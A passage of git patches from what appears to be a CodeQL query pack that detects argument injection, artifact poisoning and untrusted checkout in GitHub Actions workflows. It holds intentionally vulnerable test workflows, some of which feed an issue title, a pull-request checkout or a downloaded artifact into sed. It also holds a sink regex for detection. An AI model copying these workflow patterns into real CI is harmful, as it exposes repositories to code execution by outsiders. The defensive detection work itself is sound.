a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml new file mode 100644 index 000000000000..b5478a5e1366 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -0,0 +1,20 @@ +name: Argument injection + +on: + issues: + types: [opened, edited] + +jobs: + test1: + runs-on: ubuntu-latest + env: + TITLE: ${{github.event.issue.title}} + steps: + - run: | + echo "s/FOO/$TITLE/g" + - run: | + sed "s/FOO/$TITLE/g" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected new file mode 100644 index 000000000000..5b82e52682e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..6b3e2fd9f629 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected new file mode 100644 index 000000000000..37fd97270d7f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -0,0 +1,7 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref new file mode 100644 index 000000000000..b9c4ae95e43a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionMedium.ql From 732f0dc29fb2fe9ab81941a0e228bbfad98f2b40 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:03:25 +0200 Subject: [PATCH 395/707] feat(queries): Argument Injection Make argument injection sinks congigurable with MaD --- ql/lib/codeql/actions/config/Config.qll | 15 +++++++++-- .../actions/config/ConfigExtensions.qll | 6 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +-- .../security/ArgumentInjectionQuery.qll | 25 +++---------------- .../ext/config/argument_injection_sinks.yml | 8 ++++++ .../.github/workflows/artifactpoisoning7.yml | 1 + .../.github/workflows/artifactpoisoning8.yml | 18 +++++++++++++ .../CWE-829/.github/workflows/test9.yml | 18 +++++++++++++ .../ArtifactPoisoningCritical.expected | 4 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 3 ++- .../UntrustedCheckoutCritical.expected | 9 ++++--- 12 files changed, 83 insertions(+), 30 deletions(-) create mode 100644 ql/lib/ext/config/argument_injection_sinks.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index dd63fda93d1d..1cc8ce4eb8a1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -46,7 +46,7 @@ predicate externallyTriggerableEventsDataModel(string event) { } /** - * MaD models for poisonable commands + * MaD models for poisonable commands * Fields: * - regexp: Regular expression for matching poisonable commands */ @@ -74,7 +74,7 @@ predicate poisonableActionsDataModel(string action) { } /** - * MaD models for for event properties that can be user-controlled. + * MaD models for event properties that can be user-controlled. * Fields: * - property: event property * - kind: property kind @@ -82,3 +82,14 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 26e77ce7235f..4a492edeadfb 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -44,3 +44,9 @@ extensible predicate poisonableActionsDataModel(string action); */ extensible predicate untrustedEventPropertiesDataModel(string property, string kind); +/** + * Holds for arguments to commands that execute the given argument + */ +extensible predicate argumentInjectionSinksDataModel( + string regexp, int command_group, int argument_group +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ca0b7a70159d..a40e11bda956 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,7 +8,6 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. @@ -52,7 +51,7 @@ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | run.getScript().splitAt("\n") = line and - argumentInjectionSinks(regexp, command_group, argument_group) and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = line.regexpCapture(regexp, argument_group) and command = line.regexpCapture(regexp, command_group) and envToRunExpr(var_name, run, argument) and diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index be80cb3295d7..bf29a1c8458f 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,28 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { - * ArgumentInjectionFromFileReadSink() { - * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | - * this.asExpr() = run.getScriptScalar() and - * step.getAFollowingStep() = run and - * writeToGitHubEnv(run, content) and - * extractVariableAndValue(content, _, value) and - * outputsPartialFileContent(value) - * ) - * } - *} - */ -predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { - regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -53,6 +31,9 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 000000000000..8a9350cfebbc --- /dev/null +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + data: + - [".*(sed) (.*)", 1, 2] + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml index e815c3dd1292..63acdc612b0e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml @@ -4,6 +4,7 @@ on: workflow_run jobs: my-second-job: + runs-on: ubuntu-latest steps: - name: download pr artifact uses: dawidd6/action-download-artifact@v2 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml new file mode 100644 index 000000000000..8cb380ae0436 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml @@ -0,0 +1,18 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Use artifact + run: | + sed -f config foo.md > bar.md diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml new file mode 100644 index 000000000000..6f7ff665be3b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + base: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - run: + sed -f script/config foo.md > bar.md + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c6733eb66b8a..6b9b0f670f3d 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -41,6 +44,7 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index a18aa5bdc80e..18ad272f8031 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 124a26b1d47a..41c465dcc27c 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7b758b0da6d5..b4a099672a4f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -9,9 +9,10 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | @@ -326,6 +327,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -360,5 +362,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8d75250da74bad44e301d4a9c7553500948b5e07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:05:29 +0200 Subject: [PATCH 396/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3d20e00dddea..79545959a7df 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.16 +version: 0.1.17 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6b41b38f9a4c..30ed4dc6dae9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.16 +version: 0.1.17 groups: [actions, queries] suites: codeql-suites extractor: javascript From adbb2364655e3f871e5fd04764edeaa8dd90d874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:45:49 +0200 Subject: [PATCH 397/707] fix(query): Better identification of argument injection commands --- ql/lib/codeql/actions/config/Config.qll | 5 ++++- ql/lib/ext/config/argument_injection_sinks.yml | 2 +- .../CWE-094/.github/workflows/arg_injection.yml | 8 ++++---- .../CWE-094/ArgumentInjectionCritical.expected | 12 +++++++++--- .../CWE-094/ArgumentInjectionMedium.expected | 8 ++++++-- 5 files changed, 24 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 1cc8ce4eb8a1..8d97e63786b5 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -91,5 +91,8 @@ predicate untrustedEventPropertiesDataModel(string property, string kind) { * - argument_group: capture group for the argument. */ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" + ) } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 8a9350cfebbc..727c982d2ec2 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,5 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: - - [".*(sed) (.*)", 1, 2] + - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index b5478a5e1366..19435af16d3b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -10,10 +10,10 @@ jobs: env: TITLE: ${{github.event.issue.title}} steps: - - run: | - echo "s/FOO/$TITLE/g" - - run: | - sed "s/FOO/$TITLE/g" + - run: echo "s/FOO/$TITLE/g" + - run: sed "s/FOO/$TITLE/g" + - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 5b82e52682e0..21483efe36ca 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -1,8 +1,14 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo 